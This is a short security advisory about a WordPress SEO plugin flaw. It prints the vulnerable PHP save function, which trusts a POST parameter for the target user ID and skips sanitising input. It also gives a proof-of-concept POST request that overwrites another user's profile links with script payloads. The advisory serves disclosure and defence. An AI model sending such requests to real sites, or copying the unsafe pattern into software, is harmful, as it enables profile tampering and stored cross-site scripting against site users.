Google SEO Pressor for Rich snippets [Unauthorized Profile Update]
Description
Google SEO Pressor for Rich snippets provides the functionality to store users social information like Facebook account, Twitter account etc. The function responsible for this action does not properly save user specific data to DB thus allowing a registered user to change this information for all other users.
The vulnerable code (mind the $_POST['currentuser'] param that is used
to update the usermeta):
add_action( 'personal_options_update', 'yoursite_save_extra_user_profile_fields' );
add_action( 'edit_user_profile_update', 'yoursite_save_extra_user_profile_fields' );
function yoursite_save_extra_user_profile_fields( $user_id ) {
$saved = false;
if ( current_user_can( 'edit_user', $user_id ) ) {
$profilelinks=array('gplus'=>$_POST['gplus'],'fbook'=>$_POST['fbook'],'twit'=>$_POST['twit'],'linkin'=>$_POST['linkin'],'latitude'=>$_POST['latitude'],'longitude'=>$_POST['longitude']);
update_user_meta( $_POST['currentuser'], 'smack_social_links', $profilelinks );
$saved = true;
}
return true;
}
In addition the provided input doesn’t get properly sanitized allowing to store raw HTML elements in DB.
PoC
POST /wp-admin/profile.php HTTP/1.1
Cookie: [COOKIES]
_wpnonce=[NONCE]
&checkuser_id=[YOUR USER ID]
&user_id=[YOUR USER ID]
¤tuser=[ANOTHER USER ID]
&gplus=<script>alert(/GooglePlus/)</script>
&fbook=<script>alert(/Facebook/)</script>
&twit=<script>alert(/Twitter/)</script>
&linkin=<script>alert(/LinkedIn/)</script>
&latitude=<script>alert(/Latitude/)</script>
&longitude=<script>alert(/Longitude/)</script>
&_wp_http_referer=/wp-admin/profile.php
&from=profile
&nickname=subscriber
&display_name=subscriber
&[email protected]
&action=update
&submit=Update+Profile
INFO
- 25 April 2016
- Pan Vag
- www.smackcoders.com
- Google SEO Pressor for Rich snippets
- 1.2.6
- WordPress 4.5
- DWF-2016-87027